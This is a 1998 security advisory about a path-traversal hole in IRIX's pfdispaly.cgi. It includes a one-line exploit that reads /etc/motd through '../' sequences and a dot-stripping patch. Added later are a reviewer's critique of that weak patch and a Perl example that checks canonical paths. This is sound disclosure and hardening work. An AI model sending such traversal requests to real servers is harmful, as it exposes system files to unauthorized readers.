- Date: Tue, 17 Mar 1998 00:06:48 +0100
- From: "J.A. Gutierrez" <spd@GTC1.CPS.UNIZAR.ES>
- Subject: IRIX performer_tools bug
-
- Do you remember the /cgi-bin/handler bug?
-
- Well, more of the same:
-
- Software:
- IRIX 6.2
- performer_tools.sw.webtools (Performer API Search Tool 2.2)
- /var/www/cgi-bin/pfdispaly.cgi
-
- Bug: Anyone can read files (as 'nobody') from your system:
-
- Exploit:
-
- lynx -source \
- 'http://victim.com/cgi-bin/pfdispaly.cgi?/../../../../etc/motd'
-
- for instance :-)
-
-
- Fix:
-
- *** pfdispaly.cgi.O Mon Mar 16 23:13:34 1998
- --- pfdispaly.cgi Mon Mar 16 23:36:29 1998
- ***************
- *** 14,19 ****
- --- 14,20 ----
- $fullcgiroot = "/var/www$cgiroot";
-
- $shortfilepath = "$ARGV[0]";
- + $shortfilepath =~ s/\.{2,}//g;
- $fullfilepath = "$maindocroot$shortfilepath";
- ($filename = $shortfilepath) =~ s/.*\/(.*)$/$1/;
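Review bot: The added `$shortfilepath =~ s/\.{2,}//g;` line silently rewrites the request instead of refusing it, and it deletes every run of two or more dots anywhere in the string, so a legitimate name such as `notes..txt` is altered as well. Rejecting the request when any path component equals `..`, and then checking that the resolved `$fullfilepath` still lies under `$maindocroot`, would state the intent directly and would not rely on dot sequences being the only way out of the document root. The filter covers `$shortfilepath` only, so any later use of `$ARGV[0]` itself further down the script remains unfiltered, and a one-line comment on why the substitution is there would help the next maintainer.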
-
-
-
- Note: I haven't tested the other Performer CGIs too much,
- maybe they will have more nasty bugs.
- (in fact, pfdispaly.cgi opens "$ARGV[0]" with "$maindocroot"
- prepended; but somewhere 'dangerous' characters are escaped)
-
- There is another bug in pfsearch.cgi, which lacks a
- print "Content-type: text/html\n\n";
- line, so you get garbage in your browser.
-
- (and even worse, you have to enable JavaScript if you want
- to use this set of CGIs...)
-
-
- --
- J.A. Gutierrez So be easy and free
- when you're drinking with me
- I'm a man you don't meet every day
- finger me for PGP (the pogues)
-
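One way to enforce what the fix is after, as an added example that is not part of the original post or of the Performer CGI itself: resolve the requested path and serve it only if the canonical result is still inside the document root. The sandbox directories, the file names and `resolve_under_docroot` are hypothetical, and `$docroot` stands in for the script's `$maindocroot`.

```perl
#!/usr/bin/perl
use strict;
use warnings;
use Cwd qw(realpath);
use File::Temp qw(tempdir);
use File::Path qw(make_path);

# Resolve a requested path under $docroot. Returns the canonical path only if
# it names an existing regular file that is still inside $docroot once ".."
# components and symlinks have been resolved; returns undef otherwise.
sub resolve_under_docroot {
    my ($docroot, $request) = @_;
    return if !defined $request || $request =~ /\0/;    # refuse NUL bytes
    my $root = realpath($docroot);
    return unless defined $root;
    my $real = realpath("$root/$request");
    return unless defined $real && -f $real;
    # Containment check on the canonical path, with a separator boundary so
    # that "/docs-other" does not pass as being under "/docs".
    return unless index($real, "$root/") == 0;
    return $real;
}

# Constructed sandbox: a document root with one page, and a file outside it.
my $base    = tempdir(CLEANUP => 1);
my $docroot = "$base/docs";          # hypothetical stand-in for $maindocroot
make_path("$docroot/man");
for my $f ("$docroot/man/index.html", "$base/secret.txt") {
    open(my $fh, '>', $f) or die "cannot create $f: $!";
    print {$fh} "sample\n";
    close $fh;
}

# Constructed requests, in the form the CGI receives them in $ARGV[0].
for my $req ('/man/index.html', '/man/../man/index.html',
             '/../secret.txt', '/man/../../secret.txt', '/man/missing.html') {
    my $path = resolve_under_docroot($docroot, $req);
    printf "%-26s %s\n", $req, defined $path ? 'serve' : 'reject';
}
```

The first two requests resolve inside the document root and are served; the other three are rejected. A caller would then read the returned path with the three-argument form, `open(my $fh, '<', $path)`.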